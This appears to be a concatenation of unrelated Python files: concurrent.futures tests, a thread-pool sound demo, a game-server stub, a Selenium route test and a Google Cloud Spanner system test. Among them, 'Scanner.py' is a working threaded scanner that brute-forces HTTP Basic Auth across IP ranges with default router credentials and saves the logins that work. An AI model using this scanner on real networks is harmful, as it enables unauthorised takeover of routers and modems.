self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
test2.py | import winsound
from threading import Thread
from concurrent import futures
import threading # python3的threading函数
import time
from concurrent.futures import ThreadPoolExecutor
r = True;
def play_sound():
# winsound.PlaySound("dank", winsound.SND_ALIAS)
# winsound.PlaySound(r"dank")
global r
if r:
r = False
winsound.PlaySound("dank", winsound.SND_ALIAS)
r = True
def job1():
print('执行1')
def job2():
print('执行2')
def job3():
print('执行3')
if __name__ == '__main__':
# for i in range(5):
# thread = Thread(target=play_sound)
# thread.start()
pool = ThreadPoolExecutor(max_workers=3) # 线程池大小为3
future1 = pool.submit(play_sound)
future2 = pool.submit(play_sound) # 将任务加到线程池里
pool.shutdown() # 关闭线程池
|
utopia.py | # Note: Use reflection to initialize custom GameServer.py
#from person import Person
#theObj = globals()["Person"]()
#print theObj.getName()
# Utopia - A government simulator that works
# Aurura 2017. Published under the MITv3 License.
# https://github.com/xhj1102/Utopia
#
# Entry for command-line interaction.
# utopia.py - Main Program
#
import time
from multiprocessing import Process, Queue
import lib.GameServer as GameServer
# .fjttii;iijfjtiitjft
# :ffjttttitjjfjttjjjjjttt.
# :ffjLffjjjjffftjjjjfffttit
# :GLGGLLLLLffffjjttjjfLfLLft,
# GLGGGGLGLLLLffLjtjitjLjjjtjt
# GLGGDGLGGLGGfLLLjjftttfjjjjtt
# LGGDDDGDGGGGGGDGfjitjjjGLGDfj,
# ,EGDDDDDGGGLGLGLGGfjfjjjfLGfjfL
# #EDDDGEEDDGGGGLGDEfLffjGGfjtjf
# WDDDDDDEDDDGGfLLGDEDfjf#fDtttf
# WDEDDDGDGGDEDfLLGDDKKKG Lijj:
# KEKEDDGGGEDKLjLGGG#KKEK ..fi:
# .GKKEDGLGEKELLGLLtKEGGD LLi
# : GGKKDGGG;i.GfLfG DGGD jfG
# W DGEWEDDD tLfLD GLLL .fG
# W DDKt LDD LfL: ffLL fL
# # EK:. GD LLL DGG fL
# .EK GG LLL DGG ,f,
# EEK GG: LfG ,Lf Kf
# DDW GGG ffLGE LL fL
# :DDL EGLffGDK GD G
# :DGD GLGLE Gf, L
# EEDD, GD , .fLL. .L
def createTimeServer(queue):
server = GameServer.GameServer(queue)
pass
q = Queue()
p = Process(target=createTimeServer, args=(q,))
p.start()
|
~test_selenium.py | # this is an old test built to use selenium on a hybrid flask test including selenium.
# This test is probably abandoned and will never be revised to confirm whether it continues to work,
# but it does contain some useful architecture for debugging selenium tests.
import threading
import traceback
from time import sleep
from pprint import pprint
import re
import subprocess
from api import mobile_api
from selenium import webdriver
from selenium.common.exceptions import (ElementNotVisibleException, WebDriverException,
NoSuchElementException, InvalidElementStateException)
from selenium.webdriver.common.by import By
from selenium.webdriver.support.expected_conditions import visibility_of_element_located
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
from django.test import TransactionTestCase, SimpleTestCase
from database.study_models import Study
from database.user_models import Researcher
from pages import admin_pages
PAGE_RESPONSES = {
'400': '</head><body><h1>Bad Request</h1>',
'401': "<p>The server could not verify that you are authorized to access the URL requested. You either supplied the wrong credentials (e.g. a bad password), or your browser doesn't understand how to supply the credentials required.</p>",
'403': "<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>",
'404': '<h1 class="center">404 Page Not Found</h1>',
'405': "<p>The method is not allowed for the requested URL.</p>",
'500': '<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>',
}
ADMIN_PAGES = {
'/reset_download_api_credentials': {'method': 'pass'},
'/reset_admin_password': {'method': 'pass'},
'/manage_credentials': {'method': 'get'},
'/validate_login': {'method': 'pass'},
'/choose_study': {'method': 'get'},
'/logout': {'method': 'pass'},
'/admin': {'method': 'get'},
'/': {'method': 'get'},
'/data-pipeline/<string:study_id>': {'method': 'get_param'},
'/view_study/<string:study_id>': {'method': 'get_param'},
'/static/<path:filename>': {'method': 'pass'},
}
def pause_if_error(func):
def inner_pause_if_error(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
print("==============================================")
if isinstance(e, AssertionError):
pprint(e)
print("==============================================")
input()
raise
traceback.print_exc()
print("==============================================")
print("Press enter to exit")
input()
raise
return inner_pause_if_error
class FlaskTest(TransactionTestCase):
@classmethod
def setUpClass(cls):
chrome_options = Options()
cls.selenium = webdriver.Chrome(WEBDRIVER_LOC,
chrome_options=chrome_options)
cls.selenium.set_page_load_timeout(10)
cls.flask_task = threading.Thread(target=run_flask)
# Make thread a deamon so the main thread won't wait for it to close
cls.flask_task.daemon = True
# Start thread
cls.flask_task.start()
sleep(1)
super(FlaskTest, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# end flask thread by giving it a timeout
cls.flask_task.join(.1)
cls.selenium.close()
super(FlaskTest, cls).tearDownClass()
class TestRoutes(FlaskTest):
def setUp(self):
pass
def tearDown(self):
pass
@pause_if_error
def test_all_routes(self):
"""
Tests urls
"""
app2 = subdomain("frontend")
app2.register_blueprint(admin_pages.admin_pages)
long_encryption_key = 'aabbccddefggiijjkklmnoppqqrrsstt'
researcher = Researcher.create_with_password('test_user', 'test_password')
researcher.admin = True
researcher.reset_access_credentials()
researcher.save()
study = Study.create_with_object_id(name='test_study', encryption_key=long_encryption_key)
researcher.studies.add(study)
self.selenium.get("localhost:54321")
self.selenium.find_element_by_name('username').send_keys('test_user')
self.selenium.find_element_by_name('password').send_keys('test_password')
self.selenium.find_element_by_name('submit').click()
for rule in app2.url_map.iter_rules():
str_rule = str(rule)
self.assertIn(str_rule, ADMIN_PAGES)
if ADMIN_PAGES[str_rule]['method'] == 'get':
self.selenium.get("localhost:54321" + str_rule)
elif ADMIN_PAGES[str_rule]['method'] == 'post':
continue
elif ADMIN_PAGES[str_rule]['method'] == 'get_param':
str_rule_formatted = re.sub(r"<\w+:\w+>", str(study.id), str_rule)
self.selenium.get("localhost:54321" + str_rule_formatted)
else:
continue
response = self.determine_errors()
self.assertEqual(response, '200')
def determine_errors(self):
responses = []
for response_code, page_response in PAGE_RESPONSES.items():
if page_response in self.selenium.page_source:
responses.append(response_code)
if len(responses) > 1:
raise Exception("One page has indicators of multiple page responses")
elif len(responses) == 1:
return responses[0]
else:
return "200"
def run_flask():
flask_app.run(host='0.0.0.0', port=54321, debug=False)
|
Scanner.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import urllib2
import base64
import time
import sys
start_time = None
current_host = None
hosts_scanned = 0
found = []
usernames = ['admin', 'Admin', 'sysadmin', 'superuser', 'comcast', 'root', 'cisco', 'administrator', 'Administrator', 'netman', 'Any', '']
passwords = ['admin', 'sysadmin', 'password', 'changeme', 'comcast', 'root', 'cisco', '1234', '2wire', 'Wireless', 'netgear1', '']
units = [1 << (8 * i) for i in range(3, -1, -1)]
def ip_to_int(ip):
return sum(int(byte) * unit for (byte, unit) in zip(ip.split('.'), units))
def int_to_ip(i):
return '.'.join(str((i / bit) & 0xff) for bit in units)
def isBasicAuth(host, timeout):
response = None
try:
response = urllib2.urlopen('http://'+host, timeout=timeout)
except urllib2.HTTPError as exc:
response = exc
except:
return False
header = response.info().getheader('WWW-Authenticate')
if header and header.lower().startswith('basic'):
return True
else:
return False
def update_stats():
sys.stdout.write('\r|%d\t\t|%d\t\t|%d\t\t|%s.*' % (len(found), int(hosts_scanned / (time.time() - start_time)), threading.activeCount()-1, '.'.join(current_host.split('.')[0:3])))
sys.stdout.flush()
def brute_force(host, timeout, semaphore_object):
global found
global current_host
global hosts_scanned
current_host = host
if isBasicAuth(host, timeout):
for username in usernames:
for password in passwords:
try:
openedRequest = urllib2.urlopen(urllib2.Request('http://'+host, None, {'Authorization':'Basic %s' % base64.encodestring('%s:%s' % (username, password)).replace('\n', '')}), timeout=timeout)
if openedRequest:
if ('router' in openedRequest.read().lower()) | ('modem' in openedRequest.read().lower()):
found.append('%s:%s:%s' % (host, username, password))
hosts_scanned += 1
update_stats()
semaphore_object.release()
return None
except:
pass
hosts_scanned += 1
update_stats()
semaphore_object.release()
else:
hosts_scanned += 1
update_stats()
semaphore_object.release()
def main():
global start_time
if len(sys.argv) < 6:
print 'Usage: python %s [START-IP] [END-IP] [OUTPUT-FILE] [THREADS] [TIMEOUT]' % sys.argv[0]
sys.exit()
threads = []
semaphore = threading.BoundedSemaphore(value=int(sys.argv[4]))
ips = (int_to_ip(i) for i in xrange(ip_to_int(sys.argv[1]), ip_to_int(sys.argv[2])))
print 'Starting Scan...\nFound\t\tHost/s\t\tThreads\t\tCurrent'
start_time = time.time()
for ip in ips:
semaphore.acquire()
thread = threading.Thread(target=brute_force, args=(ip, float(sys.argv[5]), semaphore))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print '\nWriting data to file...'
with open(sys.argv[3], 'a') as out_file:
for fd in found:
out_file.write('http://' + fd + '\n')
if __name__ == '__main__':
main()
|
test_system.py | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import math
import operator
import os
import struct
import threading
import time
import unittest
from google.cloud.spanner_v1.proto.type_pb2 import ARRAY
from google.cloud.spanner_v1.proto.type_pb2 import BOOL
from google.cloud.spanner_v1.proto.type_pb2 import BYTES
from google.cloud.spanner_v1.proto.type_pb2 import DATE
from google.cloud.spanner_v1.proto.type_pb2 import FLOAT64
from google.cloud.spanner_v1.proto.type_pb2 import INT64
from google.cloud.spanner_v1.proto.type_pb2 import STRING
from google.cloud.spanner_v1.proto.type_pb2 import TIMESTAMP
from google.cloud.spanner_v1.proto.type_pb2 import Type
from google.gax.grpc import exc_to_code
from google.gax import errors
from grpc import StatusCode
from google.cloud._helpers import UTC
from google.cloud.exceptions import GrpcRendezvous
from google.cloud.spanner_v1._helpers import TimestampWithNanoseconds
from google.cloud.spanner import Client
from google.cloud.spanner import KeyRange
from google.cloud.spanner import KeySet
from google.cloud.spanner import BurstyPool
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
CREATE_INSTANCE = os.getenv(
'GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE') is not None
if CREATE_INSTANCE:
INSTANCE_ID = 'google-cloud' + unique_resource_id('-')
else:
INSTANCE_ID = os.environ.get('GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE',
'google-cloud-python-systest')
DATABASE_ID = 'test_database'
EXISTING_INSTANCES = []
COUNTERS_TABLE = 'counters'
COUNTERS_COLUMNS = ('name', 'value')
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _retry_on_unavailable(exc):
"""Retry only errors whose status code is 'UNAVAILABLE'."""
return exc.code() == StatusCode.UNAVAILABLE
def _has_all_ddl(database):
return len(database.ddl_statements) == len(DDL_STATEMENTS)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
Config.CLIENT = Client()
retry = RetryErrors(GrpcRendezvous, error_predicate=_retry_on_unavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if '-us-' in config.name]
if len(configs) < 1:
raise ValueError('List instance configs failed in module set up.')
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
if CREATE_INSTANCE:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID, config_name)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (instance in EXISTING_INSTANCES or
instance == Config.INSTANCE)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(
INSTANCE_ID, Config.INSTANCE_CONFIG.name)
# Make sure metadata unset before reloading.
instance.display_name = None
instance.reload()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, 'Skipping instance creation')
def test_create_instance(self):
ALT_INSTANCE_ID = 'new' + unique_resource_id('-')
instance = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = 'Foo Bar Baz'
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = 'contacts'
COLUMNS = ('contact_id', 'first_name', 'last_name', 'email')
ROW_DATA = (
(1, u'Phred', u'Phlyntstone', u'phred@example.com'),
(2, u'Bharney', u'Rhubble', u'bharney@example.com'),
(3, u'Wylma', u'Phlyntstone', u'wylma@example.com'),
)
ALL = KeySet(all_=True)
SQL = 'SELECT * FROM contacts ORDER BY contact_id'
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, TimestampWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_row_data(self, row_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(row_data), len(expected))
for found, expected in zip(row_data, expected):
self.assertEqual(len(found), len(expected))
for found_cell, expected_cell in zip(found, expected):
if isinstance(found_cell, TimestampWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
pool = BurstyPool()
cls._db = Config.INSTANCE.database(
DATABASE_ID, ddl_statements=DDL_STATEMENTS, pool=pool)
cls._db.create()
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
databases = list(Config.INSTANCE.list_databases())
self.assertEqual(databases, [self._db])
def test_create_database(self):
pool = BurstyPool()
temp_db_id = 'temp-db' # test w/ hyphen
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
name_attr = operator.attrgetter('name')
expected = sorted([temp_db, self._db], key=name_attr)
databases = list(Config.INSTANCE.list_databases())
found = sorted(databases, key=name_attr)
self.assertEqual(found, expected)
def test_update_database_ddl(self):
pool = BurstyPool()
temp_db_id = 'temp_db'
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(90) # raises on failure / timeout.
operation = temp_db.update_ddl(DDL_STATEMENTS)
# We want to make sure the operation completes.
operation.result(90) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(DDL_STATEMENTS))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(
test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_row_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(
test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_row_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name='id_1')
with self.assertRaises(errors.RetryError) as expected:
self._db.run_in_transaction(_unit_of_work, name='id_1')
self.assertEqual(
exc_to_code(expected.exception.cause), StatusCode.ALREADY_EXISTS)
self._db.run_in_transaction(_unit_of_work, name='id_2')
with self._db.snapshot() as after:
rows = list(after.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
class TestSessionAPI(unittest.TestCase, _TestData):
ALL_TYPES_TABLE = 'all_types'
ALL_TYPES_COLUMNS = (
'list_goes_on',
'are_you_sure',
'raw_data',
'hwhen',
'approx_value',
'eye_d',
'description',
'exactly_hwhen',
)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = TimestampWithNanoseconds(1995, 8, 31, nanosecond=987654321)
OTHER_NAN, = struct.unpack('<d', b'\x01\x00\x01\x00\x00\x00\xf8\xff')
BYTES_1 = b'Ymlu'
BYTES_2 = b'Ym9vdHM='
ALL_TYPES_ROWDATA = (
([], False, None, None, 0.0, None, None, None),
([1], True, BYTES_1, SOME_DATE, 0.0, 19, u'dog', SOME_TIME),
([5, 10], True, BYTES_1, None, 1.25, 99, u'cat', None),
([], False, BYTES_2, None, float('inf'), 107, u'frog', None),
([3, None, 9], False, None, None, float('-inf'), 207, None, None),
([], False, None, None, float('nan'), 1207, None, None),
([], False, None, None, OTHER_NAN, 2000, None, NANO_TIME),
)
@classmethod
def setUpClass(cls):
pool = BurstyPool()
cls._db = Config.INSTANCE.database(
DATABASE_ID, ddl_statements=DDL_STATEMENTS, pool=pool)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
batch = session.batch()
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
batch.commit()
snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.ALL_TYPES_TABLE, self.ALL)
batch.insert(
self.ALL_TYPES_TABLE,
self.ALL_TYPES_COLUMNS,
self.ALL_TYPES_ROWDATA)
